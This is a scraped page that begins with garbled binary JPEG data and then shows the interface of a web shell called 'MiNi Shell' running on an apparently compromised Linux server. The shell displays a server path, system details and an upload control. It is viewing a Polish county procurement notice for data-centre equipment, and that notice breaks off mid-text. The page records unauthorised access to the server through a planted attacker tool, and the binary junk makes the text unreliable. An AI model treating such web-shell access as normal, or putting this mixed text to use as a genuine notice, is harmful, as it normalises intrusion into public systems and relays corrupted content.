JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210823/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20210823/0015661504-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Zakup i dostawa sprzętu w ramach budowy Data Center i modernizacji sieci LAN oraz zakup<br/>sprzętu komputerowego i urządzeń wielofunkcyjnych w Starostwie Powiatowym w Oleśnicy”,<br/>zadanie I </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Oleśnicki</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Starostwo Powiatowe w Oleśnicy</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 931934696</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Słowackiego 10</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Oleśnica</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">56-400</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">dolnośląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL518 - Wrocławski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">713140111</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">713140110</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">biuropodawcze@powiat-olesnicki.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.powiat-olesnicki.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Zakup i dostawa sprzętu w ramach budowy Data Center i modernizacji sieci LAN oraz zakup<br/>sprzętu komputerowego i urządzeń wielofunkcyjnych w Starostwie Powiatowym w Oleśnicy”,<br/>zadanie I </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-2116d357-019d-11ec-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00156615</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">04</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-23</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001267/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.2 Dostawa serwerów, macierzy dyskowych, oprogramowania, dysków twardych, przełączników warstwy dystrybucyjnej/agregacyjnej, dostawa zestawów komputerowych i monitorów, dostawa urządzeń wielofunkcyjnych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://powiat-olesnicki.ezamawiajacy.pl <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://powiatolesnicki.ezamawiajacy.pl</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1. Ofertę,<br/>oraz dokumenty o których mowa w Rozdziale XII pkt 12. SWZ składa się, pod rygorem nieważności, w<br/>formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem<br/>osobistym.<br/>3. W przedmiotowym postępowaniu Zamawiający dopuszcza możliwość przekazywania sobie przez<br/>strony postępowania oświadczeń, wniosków, zawiadomień oraz informacji:<br/>a) Elektronicznie na adres e-mail: zamowienia@powiat-olesnicki.pl lub<br/>b) za pośrednictwem Platformy znajdującej się pod adresem: HTTPS://POWIATOLESNICKI.<br/>EZAMAWIAJACY.PL w zakładce „Korespondencja”.<br/>Ofertę, oświadczenia, o których mowa w art. 125 ust. 1 p.z.p., podmiotowe środki dowodowe,<br/>pełnomocnictwa, zobowiązanie podmiotu udostępniającego zasoby sporządza się w postaci<br/>elektronicznej, w ogólnie dostępnych formatach<br/>danych, w szczególności w formatach .txt, .rtf, .pdf, .doc, .docx, .odt.<br/>4.Ofertę, formularz cenowy a także oświadczenie o jakim mowa w Rozdziale X ust. 1 SWZ składa się,<br/>pod rygorem nieważności, w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem<br/>zaufanym lub podpisem osobistym. 3. W przedmiotowym postępowaniu Zamawiający dopuszczamożliwość przekazywania sobie przez strony postępowania oświadczeń, wniosków, zawiadomień oraz<br/>informacji:<br/>a) Elektronicznie na adres e-mail: zamowienia@powiat-olesnicki.pl lub<br/>b) za pośrednictwem Platformy znajdującej się pod adresem: HTTPS://POWIATOLESNICKI.<br/>EZAMAWIAJACY.PL w zakładce „Korespondencja”.<br/>6. Zamawiający informuje, iż w przypadku jakichkolwiek wątpliwości związanych z zasadami<br/>korzystania z Platformy, Wykonawca winien skontaktować się z dostawcą rozwiązania<br/>teleinformatycznego Platforma zakupowa tel. +48 22 257 22 23 (infolinia dostępna w dni robocze, w<br/>godzinach 9.00-17.00) e-mail: oneplace@marketplanet.pl<br/>7. Zamawiający określa dopuszczalny format podpisu elektronicznego, jako:<br/>7.1. dokumenty w formacie „pdf" zaleca się podpisywać formatem PAdES,<br/>7.2. dopuszcza się podpisanie dokumentów w formacie innym niż „pdf", wtedy będzie wymagany<br/>oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć, prócz<br/>podpisanego dokumentu, oddzielny plik z podpisem.8. Zamawiający określa niezbędne wymagania<br/>sprzętowo- aplikacyjne umożliwiające pracę na Platformie Zakupowej, , zgodnie z § 11 ust. 2 ww.<br/>Rozporządzenia tj.:<br/>8.1. Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>8.2. Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7 , Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>8.3. Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2,<br/>najlepiej w najnowszej wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>8.4. Włączona obsługa JavaScript;<br/>8.5. Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>8.6. informacje dotyczące odpowiedniego przygotowania stanowiska znajdą Państwa na stronie:<br/>https://oneplace.marketplanet.pl/przygotuj-stanowisko-pc-wykonujac-ponizsze-kroki.<br/>9. Zamawiający określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB w<br/>txt, rtf, pdf ,xps, odt, ods, odp, doc, xls, ppt, docx, xlsx, pptx, csv, jpg, jpeg, tif, tiff, geotiff, png, svg,<br/>wav, mp3, avi, mpg, mpeg, mp4, m4a, mpeg4, ogg, ogv, zip, tar, gz, gzip, 7z, html, xhtml, css, xml, xsd,<br/>gml, rng, xsl, xslt,<br/>TSL, XMLsig, XAdES, CAdES, ASIC, XMLenc.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający dopuszcza złożenie oferty w postaci katalogu</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Na podstawie art. 13 Rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych), przekazujemy Pani/Panu<br/>poniższe informacje związane z przetwarzaniem Pani/Pana danych osobowych.Administrator Danych<br/>Administratorem Pani/Pana danych osobowych jest:Starosta Powiatu Oleśnickiego ul. J. Słowackiego<br/>1056- 400 Oleśnica Dane kontaktowe Z AD można się skontaktować:tel.: 71/314-01-14, 71/314-01-11,<br/>fax: 71/314-01-10<br/>e-mail: biuropodawcze@powiat-olesnicki.plInspektor Ochrony Danych mgr inż.<br/>Sebastian KOPACKI - iodo@powiat-olesnicki.plCele przetwarzania oraz podstawa prawna<br/>przetwarzania Pani/Pana dane osobowe będą w celu: a. wypełnienia obowiązku prawnego ciążącego<br/>na administratorze podstawą przetwarzania Państwa danych osobowych jest art. 6 ust. 1 lit. c) RODO –<br/>celem przygotowania i przeprowadzenia postępowania o udzielenie zamówienia publicznego.Okres,<br/>przez który będą przetwarzane Pani/Pana dane osobowe będą przetwarzane przez okres: a. AD<br/>przechowuje protokół postępowania wraz z załącznikami przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, w sposób gwarantujący jego nienaruszalność.b. Jeżeli okres<br/>obowiązywania umowy w sprawie zamówienia publicznego przekracza 4 lata, AD przechowuje protokół postępowania wraz z załącznikami przez cały okres obowiązywania umowy w sprawie zamówienia<br/>publicznego.c. AD przechowuje dokumentację konkursu przez okres 4 lat od dnia ustalenia wyników<br/>konkursu w postaci, w jakiej została ona sporządzona lub przekazana, w sposób gwarantujący jej<br/>nienaruszalność i możliwość odczytania zgodnie z Ustawą Prawo Zamówień Publicznych (art. 78 ust. 1<br/>i ust. 4, art. 358 ust. 1 Ustawa pzp). Odbiorcy danych Osoby lub podmioty, którym udostępniona<br/>zostanie dokumentacja postępowania w oparciu o art. 18 ust. 1 Ustawy pzp.Prawa osoby, której dane<br/>dotyczą Posiada Pani/Pan:na podstawie art. 15 RODO prawo dostępu do danych osobowych<br/>Pani/Pana dotyczących;na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych<br/>osobowych*;na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania<br/>danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO**; prawo do<br/>wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;Nie przysługuje<br/>Pani/Panu:− w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;−<br/>prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;− na podstawie art. 21<br/>RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną<br/>przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">dotyczy cd. RODO * Wyjaśnienie: skorzystanie z prawa do<br/>sprostowania nie może skutkować zmianą wyniku postępowania o udzielenie zamówienia publicznego<br/>ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników.**Wyjaśnienie: prawo do ograniczenia przetwarzania nie<br/>ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków,<br/>ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne<br/>względy interesu publicznego Unii Europejskiej lub państwa członkowskiego.Dodatkowe informacje<br/>Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego a konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp. Pani/Pana dane osobowe nie będą podlegały profilowaniu jak również nie będą<br/>przekazywane do Państwa trzeciego. Przysługuje Pani/Panu prawo wniesienia skargi do Urzędu<br/>Ochrony Danych Osobowych. Więcej informacji na temat przetwarzania przez Nas Państwa danych<br/>osobowych można znaleźć na stronie www Administratora Danych.Wykonawca, wypełniając obowiązki<br/>informacyjne wynikający z art. 13 lub art. 14 RODO względem osób fizycznych, od których dane<br/>osobowe bezpośrednio lub pośrednio pozyskał w celu ubiegania się o udzielenie zamówienia<br/>publicznego w tym postępowaniu składa stosowne oświadczenie zawarte w Formularzu ofertowym<br/>(Załącznik nr 1 do SWZ).W związku z prowadzeniem postępowania z użyciem Platformy Zakupowej<br/>Zamawiający informuje, że:Odbiorcą Pani/Pana danych osobowych spółka Otwarty Rynek<br/>Elektroniczny S.A. siedzibą w Warszawie (02-672) przy ul. Domaniewskiej 49, wpisaną do Rejestru<br/>Przedsiębiorców Krajowego Rejestru Sądowego, prowadzonego przez Sąd Rejonowy dla m.st.<br/>Warszawy w Warszawie XIII Wydział Gospodarczy Krajowego Rejestru Sądowego pod numerem KRS:<br/>0000041441, REGON: 017282436, NIP: 526-25-35-153, jako właściciel Platformy Zakupowej, na której<br/>Powiat Oleśnicki prowadzi postępowania o udzielenie zamówienia publicznego, działającą pod<br/>adresem: HTTPS://POWIAT-OLESNICKI.EZAMAWIAJACY.PL</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RP.272.1.5.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Zakup i dostawa serwerów, osprzętu serwerowego, macierzy dyskowych, oprogramowania,<br/>dysków twardych wraz z kartami i okablowaniem oraz zakup i dostawa przełączników warstwy<br/>dystrybucyjnej/agregacyjnej.Szczegółowy opis przedmiotu zamówienia zawarty został w<br/>załączniku nr 7 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">48820000-2 - Serwery</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30233000-1 - Urządzenia do przechowywania i odczytu danych</p> <p class="mb-0">30234000-8 - Nośniki do przechowywania</p> <p class="mb-0">48620000-0 - Systemy operacyjne</p> <p class="mb-0">48821000-9 - Serwery sieciowe</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">1 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Za najkorzystniejszą zostanie uznana w danej części oferta, która<br/>uzyska największą liczbę punktów (ze wszystkich kryteriów). Uzyskana liczba punktów w ramach<br/>kryterium zaokrąglona będzie do drugiego miejsca po przecinku. Jeżeli trzecia cyfra po przecinku (i/lub<br/>następne) jest mniejsza od 5 wynik zostanie zaokrąglony w dół, a jeżeli cyfra jest równa lub większa od<br/>5 wynik zostanie zaokrąglony w górę<br/>Szczegółowy sposób oceny ofert znajduje się w rozdziale XVII SWZ</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">termin dostawy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu<br/>na zasadach określonych w Rozdz. VII SWZ oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu określone w Rozdz. VI SWZ.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>4) zdolności technicznej lub zawodowej – Wykonawca spełni warunki jeśli wykaże, że:<br/>a)w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres działalności jest<br/>krótszy –w tym okresie, wykonał, co najmniej jedno zamówienie polegające na dostawie serwera<br/>o wartości nie mniejszej niż 15 000 zł brutto<br/>Uwaga: Dla wartości wyrażonych w innej walucie niż PLN Zamawiający przyjmie przelicznik<br/>według średniego kursu NBP ogłoszonego w dniu wszczęcia postępowania.<br/>3. Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada<br/>wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów, w<br/>szczególności zaangażowanie zawodowych Wykonawcy w inne przedsięwzięcia gospodarcze<br/>Wykonawcy może mieć negatywny wpływ na realizację zamówienia.<br/>4. Zamawiający, w stosunku do Wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia,<br/>w odniesieniu do warunku dotyczącego zdolności zawodowej dopuszcza łączne spełnianie<br/>warunku przez Wykonawców. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji<br/>o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych<br/>nie wcześniej niż 3 miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu<br/>do rejestru lub ewidencji, jeżeli Wykonawca nie wskazał w oświadczeniu o którym mowa<br/>w art. 125 ust. 1 Pzp, dane umożliwiające dostęp do tych środków</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Do oferty Wykonawca zobowiązany jest dołączyć aktualne na dzieńskładania ofert oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do<br/>wykluczenia<br/>z postępowania – zgodnie z załącznikiem nr 3 do SWZ;<br/>2. Informacje zawarte w oświadczeniu, o którym mowa w ust. 1 stanowią dowód potwierdzający,<br/>że Wykonawca nie podlega wykluczeniu oraz spełnia warunki udziału w postępowaniu na dzień<br/>składania ofert tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki<br/>dowodowe.<br/>3. Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia<br/>w wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, następujących podmiotowych<br/>środków dowodowych:<br/>1) odpisu lub informacji z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji i Informacji o<br/>Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 ustawy, sporządzonych nie wcześniej niż 3<br/>miesiące przed ich złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, jeżeli<br/>Wykonawca nie wskazał w oświadczeniu o którym mowa w art. 125 ust. 1 Pzp, dane umożliwiające<br/>dostęp do tych środków (o których mowa w poniższym ust 4 i ust 5 SWZ).<br/>2) wykazu dostaw wykonanych, w okresie ostatnich 3 lat, a jeżeli okres prowadzenia działalności jest<br/>krótszy –w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na<br/>rzecz których dostawy zostały wykonane oraz załączeniem dowodów określających, czy te 